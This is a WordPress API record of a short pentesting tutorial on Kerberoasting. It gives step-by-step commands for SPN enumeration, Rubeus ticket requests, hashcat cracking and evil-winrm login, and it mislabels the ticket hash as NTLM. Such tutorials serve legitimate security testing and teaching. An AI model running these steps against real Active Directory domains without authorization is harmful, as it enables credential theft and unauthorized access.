{"id":44,"date":"2025-03-06T05:38:01","date_gmt":"2025-03-06T05:38:01","guid":{"rendered":"http:\/\/racrx.io\/?p=44"},"modified":"2025-03-15T00:31:16","modified_gmt":"2025-03-15T00:31:16","slug":"kerberoasting-with-rubeus","status":"publish","type":"post","link":"https:\/\/racrx.io\/?p=44","title":{"rendered":"Kerberoasting with Rubeus"},"content":{"rendered":"\n<p>This post will walkthrough Kerberoasting attack using Rubeus. Please ensure you have appropriate authorization to perform security testing within your environment.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Prerequisites:<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A Windows machine in an Active Directory domain.<\/li>\n\n\n\n<li>Rubeus.exe (can be compiled from <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">GitHub<\/a>).<\/li>\n\n\n\n<li>A domain user account (even low-privileged) to request service tickets.<\/li>\n\n\n\n<li>Hashcat for offline cracking.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 1: Enumerate Service Principal Names (SPNs)<\/strong><\/h3>\n\n\n\n<p>Use <strong>PowerShell<\/strong> to list SPNs for accounts with service associations.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Get-ADUser -Filter {ServicePrincipalName -ne \"$null\"} -Properties ServicePrincipalName<br><\/code><\/pre>\n\n\n\n<p><strong>PowerView:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Get-NetUser -SPN<br><\/code><\/pre>\n\n\n\n<p>This provides Usernames and SPNs linked to domain service accounts.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 2: Request Kerberos Service Tickets<\/strong><\/h3>\n\n\n\n<p>Run Rubeus to request service tickets for accounts associated with SPNs.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast<br><\/code><\/pre>\n\n\n\n<p>This will retrieve TGS tickets for accounts with SPNs and display their hashes.<\/p>\n\n\n\n<p>You can also request tickets for specific users:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast \/user:svc-account<br><\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 3: Extract and Save Hashes<\/strong><\/h3>\n\n\n\n<p>Rubeus will output a hash similar to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>$krb5tgs$23$*svc-account$DOMAIN$HTTP\/service.domain.com*$e52cac67419a9a22$...<br><\/code><\/pre>\n\n\n\n<p>Save this hash to a file (hashes.txt) for offline cracking.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>Rubeus.exe kerberoast \/outfile:hashes.txt<br><\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 4: Crack the Hash Offline (Using Hashcat)<\/strong><\/h3>\n\n\n\n<p>Use Hashcat to brute-force the NTLM hash.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>hashcat -m 13100 hashes.txt \/path\/to\/wordlist.txt --force<br><\/code><\/pre>\n\n\n\n<p>If the service account has a weak password, Hashcat will recover it.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Step 5: Use the Cracked Password<\/strong><\/h3>\n\n\n\n<p>Once cracked, authenticate using Evil-WinRM, RDP, or other tools:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>evil-winrm -i &lt;target-IP&gt; -u svc-account -p &lt;cracked-password&gt;<br><\/code><\/pre>\n\n\n\n<p>If the compromised account has privileged access, this can lead to privilege escalation.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post will walkthrough Kerberoasting attack using Rubeus. Please ensure you have appropriate authorization to perform security testing within your environment. Prerequisites: Step 1: Enumerate&hellip; <a href=\"https:\/\/racrx.io\/?p=44\" class=\"apace-readmore-link\"><span class=\"screen-reader-text\">Kerberoasting with Rubeus<\/span>Read more<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-pentesting","category-red-team"],"_links":{"self":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=44"}],"version-history":[{"count":5,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44\/revisions"}],"predecessor-version":[{"id":124,"href":"https:\/\/racrx.io\/index.php?rest_route=\/wp\/v2\/posts\/44\/revisions\/124"}],"wp:attachment":[{"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/racrx.io\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}